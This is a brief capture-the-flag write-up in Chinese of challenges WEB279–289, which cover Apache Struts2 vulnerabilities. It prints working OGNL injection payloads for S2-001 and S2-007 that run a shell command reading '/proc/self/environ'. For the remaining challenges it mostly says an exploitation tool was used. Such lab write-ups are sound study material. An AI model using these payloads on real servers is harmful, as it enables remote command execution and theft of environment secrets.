- WEB279
有一句话可以点击,点击跳转
看url是S2-001的漏洞,直接百度
%{ #a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/proc/self/environ"})).redirectErrorStream(true).start(), #b=#a.getInputStream(), #c=new java.io.InputStreamReader(#b), #d=new java.io.BufferedReader(#c), #e=new char[50000], #d.read(#e), #f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"), #f.getWriter().println(new java.lang.String(#e)), #f.getWriter().flush(),#f.getWriter().close() }
输入框输入即可
不知道为啥没找到flag 直接cat /proc/self/environ
- WEB280
这里网上博客讲解的很少,大都都是工具打下来的,我也是用的struts2工具
这种工具网上很多这里就不贴了
- WEB281
我找的那个工具貌似没检查S2-007
这里给出脚本
‘ + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(‘cat /proc/self/environ‘).getInputStream())) + ‘
- WEB282
说有两种姿势,但是我是用工具的。。
- WEB283
工具
- WEB284
POC同S2-001
- WEB285-288
工具
- WEB289
没搞出来